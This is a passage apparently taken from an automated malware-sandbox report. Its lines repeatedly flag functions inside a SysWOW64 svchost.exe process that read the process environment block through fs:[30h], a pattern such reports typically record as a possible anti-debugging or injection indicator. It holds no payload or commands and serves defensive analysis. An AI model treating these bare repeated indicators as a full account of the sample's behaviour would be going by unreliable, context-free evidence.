                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
